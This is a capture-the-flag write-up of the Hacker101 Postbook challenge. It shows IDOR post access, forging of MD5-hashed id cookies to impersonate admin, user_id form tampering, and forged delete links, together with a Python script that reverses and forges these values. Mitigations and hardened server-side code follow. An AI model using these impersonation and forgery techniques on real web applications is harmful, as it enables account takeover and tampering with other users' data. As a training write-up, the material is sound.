You can register an account by clicking on Sign up. I registered an account with username=mhackerone&password=mhackerone and then logged in.
HomePage
It is a web application where you can create both private and public posts and edit or delete them once created. At first the URL made me think of LFI (Local File Inclusion) because of the page= parameter, as in https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=home.php. After a few attempts, however, I realized that there was no LFI. While inspecting the pages, I found an IDOR instead.
Post View
As we can see in the URL https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=view.php&id=3, the id parameter indicates which post is being viewed. By changing it, it is possible to read posts from other accounts (even private ones!). Let’s proceed to the exploitation phase, explaining the other vulnerabilities along the way.
🔬 Vulnerability Analysis
Potential Vulnerabilities
IDOR (Insecure Direct Object Reference)
IDOM (Insecure Direct Object Manipulation): tampering with the hidden user_id form field
Predictable Cookie
Brute-force attack
🎯 Solution Path
Exploitation Steps
Initial setup
After inspecting the pages a bit more, I decided to start by exploiting the IDOR. Let’s move on to the next phase.
Exploitation
As the homepage screenshot shows, after logging in only two posts are visible, but the second one has ID 3, so I assumed there was a hidden post with ID 2. Indeed, by changing the ID to 2 (https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=view.php&id=2), I found the first flag.
Continuing to inspect the page, I found the session cookies:
Cookies
At first glance the value looks like a hash. Running it through https://www.dcode.fr/cipher-identifier identified it as an MD5 digest, and reversing it (digests of small integers are in every lookup table) gave:
The result was 3. Since the cookie is named id, I immediately assumed it was the ID of my account. Looking closely at the homepage screenshot, there are two posts, one by admin and one by user (the two default accounts created each time a challenge instance starts), so mine would be the third. Without wasting any more time, I generated the MD5 of 1 (admin is usually the first account):
```python
import hashlib
print(hashlib.md5(b'1').hexdigest())
```
MD5 '2'
Replacing the cookie value with the freshly generated hash and refreshing the page (F5) gave me the second flag (an online tool such as https://www.md5.cz/ works just as well). I then did the same with the MD5 of 2 and found another flag, this one tied to the user account. (Reading the post-solution writeups, I discovered that brute-forcing the password was also possible, so I used that method in the automated exploit.)
Later, I logged in again with my own account and tried creating posts. I noticed that the creation form included a user_id parameter that assigns the post to the creating account, and immediately suspected that this id could be manipulated too.
User_id
So I changed the value of the parameter directly in the form’s HTML:
Modified User_id
By creating a new post with the altered user_id, I obtained the flag. I then checked whether the same was possible when editing and deleting posts, and it was, yielding two more flags. For editing, the URL https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=edit.php&id=4 carries the id of the post being edited; changing it let me modify other users’ posts, and modifying another user’s post gave a flag. As for deletion:
Delete
Inspecting the page, I noticed that clicking Delete sends a request to href=index.php?page=delete.php&id=a87ff679a2f3e71d9181a67b7542122c. That id looks just like the MD5 values seen earlier (it is the MD5 of my post’s id, 4), so, reusing the MD5 of 1 generated before, I requested the deletion of post 1, which does not belong to me. Visiting https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com/index.php?page=delete.php&id=c4ca4238a0b923820dcc509a6f75849b gave the flag for deleting someone else’s post, since I was able to delete a post that was not associated with my account.
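The cookie reversal and the forged delete link above, as an added example and not the writeup’s own exploit script: it precomputes md5(str(n)) for small n, which is what the online reverser is doing, recovers the integer behind a captured digest, and builds the forged cookie and delete URL. The sample cookie value is constructed as md5("3"), matching the result the writeup obtained; the delete-link digest is the one quoted above; the base URL is the challenge instance from the writeup.

```python
import hashlib

# Added example, not the writeup's exploit code. Postbook's id cookie and delete link both
# carry md5(str(n)) for a small integer n, so they are reversible with a lookup table.

def md5_hex(value) -> str:
    """MD5 of the decimal string form of value: md5_hex(1) == md5(b'1'), as the app uses it."""
    return hashlib.md5(str(value).encode()).hexdigest()

def build_table(max_id: int = 10_000) -> dict:
    """Precompute md5 for ids 1..max_id, mapping digest -> id (what an online reverser does)."""
    return {md5_hex(i): i for i in range(1, max_id + 1)}

def recover_id(digest: str, table: dict):
    """Return the integer behind a captured digest, or None if it is not a small integer's MD5."""
    return table.get(digest.strip().lower())

def forge_cookie(target_user_id: int) -> dict:
    """Cookie jar impersonating target_user_id: the server trusts md5(id) as the identity."""
    return {"id": md5_hex(target_user_id)}

def delete_url(base: str, post_id: int) -> str:
    """Forged delete link for a post we do not own, in the form the page's href uses."""
    return f"{base}/index.php?page=delete.php&id={md5_hex(post_id)}"

# Constructed sample values. OBSERVED_COOKIE is md5("3"), consistent with the writeup decoding
# its cookie to 3; OBSERVED_DELETE_ID is the value quoted from the delete link.
OBSERVED_COOKIE = "eccbc87e4b5ce2fe28308fd9f2a7baf3"
OBSERVED_DELETE_ID = "a87ff679a2f3e71d9181a67b7542122c"
BASE = "https://b9ad151edc833e1a2b2833e7c6a11041.ctf.hacker101.com"

if __name__ == "__main__":
    table = build_table()
    print("cookie id ->", recover_id(OBSERVED_COOKIE, table))
    print("delete id ->", recover_id(OBSERVED_DELETE_ID, table))
    for uid in (1, 2):
        print(f"cookie for user {uid}:", forge_cookie(uid))
    print("delete post 1:", delete_url(BASE, 1))
```

Note that the app hashes the decimal string ("1"), not the raw byte 0x01; hashing the wrong representation is the usual reason a "reversed" cookie fails to log you in.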
Verify server-side that the authenticated user is allowed to read the requested post before returning it, and check that the authenticated user is the post’s author before allowing any edit or deletion; the author of a new post must come from the session, never from a user_id form field.
Avoid storing the user ID in cookies (hashing it with MD5 does not hide it); use server-side sessions identified by random, unguessable tokens.
Block IPs with too many failed login attempts or, after 3-5 failures, require a CAPTCHA (e.g., Google’s reCAPTCHA).
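The three fixes above, as an added example and not Postbook’s actual code: an in-memory model of the posts table with the weak patterns from the writeup (author taken from a form field, identity taken from an md5(user_id) cookie, no ownership check) beside hardened handlers that take the user from a server-side session keyed by a random token and check authorship before every edit or delete, plus a failed-login counter for the CAPTCHA/lockout rule. The user ids, post rows and function names are assumptions.

```python
import hashlib
import secrets

# Added example, not Postbook's real code: an in-memory model of its posts showing the weak
# patterns from the writeup beside a hardened version. Rows, ids and names are assumptions.
USERS = {1: "admin", 2: "user", 3: "mhackerone"}

def sample_posts() -> dict:
    """Fresh copy of a constructed post table: post_id -> {user_id, title, private}."""
    return {
        1: {"user_id": 1, "title": "admin post", "private": False},
        2: {"user_id": 1, "title": "hidden admin post", "private": True},
        3: {"user_id": 2, "title": "user post", "private": False},
        4: {"user_id": 3, "title": "my post", "private": False},
    }

class AuthError(Exception):
    """Raised when the caller is not logged in or does not own the target post."""

# ---- Weak patterns, as exploited in the writeup ----
def vulnerable_create(posts: dict, form_user_id: int, title: str) -> int:
    """Author id comes from a form field the client controls, so it can be any user."""
    new_id = max(posts, default=0) + 1
    posts[new_id] = {"user_id": form_user_id, "title": title, "private": False}
    return new_id

def vulnerable_delete(posts: dict, cookie_id: str, post_id: int) -> bool:
    """Identity is md5(user_id) from a cookie (forgeable) and ownership is never checked."""
    known = {hashlib.md5(str(u).encode()).hexdigest() for u in USERS}
    if cookie_id not in known:
        return False
    return posts.pop(post_id, None) is not None

# ---- Hardened version ----
SESSIONS: dict = {}  # server side: random token -> user_id; the cookie carries only the token

def login(user_id: int) -> str:
    """Issue an unguessable session token instead of md5(user_id)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token

def current_user(token: str) -> int:
    uid = SESSIONS.get(token)
    if uid is None:
        raise AuthError("not logged in")
    return uid

def require_owner(posts: dict, token: str, post_id: int) -> dict:
    """Edit/delete check: same error for missing and foreign posts, so ids cannot be enumerated."""
    uid = current_user(token)
    post = posts.get(post_id)
    if post is None or post["user_id"] != uid:
        raise AuthError("forbidden")
    return post

def view_post(posts: dict, token: str, post_id: int) -> dict:
    """Public posts are readable by any logged-in user; private ones only by their author."""
    uid = current_user(token)
    post = posts.get(post_id)
    if post is None or (post["private"] and post["user_id"] != uid):
        raise AuthError("forbidden")
    return post

def create_post(posts: dict, token: str, title: str, private: bool = False) -> int:
    """The author is the session user; no user_id is accepted from the request."""
    uid = current_user(token)
    new_id = max(posts, default=0) + 1
    posts[new_id] = {"user_id": uid, "title": title, "private": private}
    return new_id

def edit_post(posts: dict, token: str, post_id: int, title: str) -> None:
    post = require_owner(posts, token, post_id)
    post["title"] = title

def delete_post(posts: dict, token: str, post_id: int) -> None:
    require_owner(posts, token, post_id)
    del posts[post_id]

def forbidden(fn, *args) -> bool:
    """True if the call is rejected with AuthError (for exercising the hardened paths)."""
    try:
        fn(*args)
    except AuthError:
        return True
    return False

class LoginThrottle:
    """Counts failed logins per key (username or client IP); past max_failures the caller
    must demand a CAPTCHA or lock the key out, which blunts password brute force."""
    def __init__(self, max_failures: int = 5):
        self.max_failures = max_failures
        self.failures: dict = {}

    def record(self, key: str, success: bool) -> None:
        if success:
            self.failures.pop(key, None)
        else:
            self.failures[key] = self.failures.get(key, 0) + 1

    def challenge_required(self, key: str) -> bool:
        return self.failures.get(key, 0) >= self.max_failures
```

The point of require_owner is that the post id in the request is only a selector; the decision about whether the caller may touch that row is made from the session, and a foreign id gets the same answer as a non-existent one.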